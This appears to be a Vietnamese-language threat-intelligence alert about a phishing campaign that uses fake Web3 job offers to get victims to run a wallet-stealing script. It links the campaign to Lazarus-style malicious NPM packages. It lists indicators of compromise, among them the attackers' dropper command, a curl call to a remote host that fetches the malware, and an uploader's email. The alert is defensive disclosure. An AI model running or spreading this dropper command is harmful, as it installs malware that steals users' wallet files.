🚨 Cảnh báo TI Bảo mật 🚨

Theo đối tác cộng đồng @1nf0s3cpt, một chiến dịch lừa đảo đang hoạt động nhằm vào người dùng Web3 với các lời mời làm việc giả (ví dụ: $120/giờ) để lừa họ thực thi một script độc hại đánh cắp tệp ví.

🔍 Các IOC chính:
🔸Repo GitLab: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Phương pháp tấn công rất giống với việc sử dụng các gói NPM của Lazarus trước đây để phát tán mã độc:
https://t.co/bBC4i2vYpA

🚨 Chúng tôi phát hiện rằng một gói NPM độc hại mới vừa được công bố:
https://t.co/SjgmO1FOIL
🔸Có thể liên kết GitHub: apollo-hero
🔸Email người tải lên: skelstar125@gmail.com

⚠️ KHÔNG cài đặt hoặc chạy các gói hoặc script không rõ nguồn gốc. Luôn kiểm tra nguồn gốc.

#LAZARUS #Lừa đảo